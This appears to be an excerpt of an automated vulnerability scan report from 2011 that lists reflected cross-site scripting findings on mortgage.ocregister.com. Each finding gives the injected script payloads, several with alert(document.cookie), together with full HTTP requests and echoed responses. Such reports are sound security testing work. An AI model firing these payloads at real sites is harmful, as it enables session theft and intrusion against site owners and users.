<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd\"><script>alert(1)</script>1f35e8c0ea2/feed/" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" /> ...[SNIP]...
1.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /feeda71cd%2522%253E%253Cscript%253Ealert(1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62689
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" /> ...[SNIP]...
1.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" /> ...[SNIP]...
1.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /files
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62657
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" /> ...[SNIP]...
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacc4"%3balert(1)//bc4341ec3d3 was submitted in the lang parameter. This input was echoed as dacc4";alert(1)//bc4341ec3d3 in the application's response.
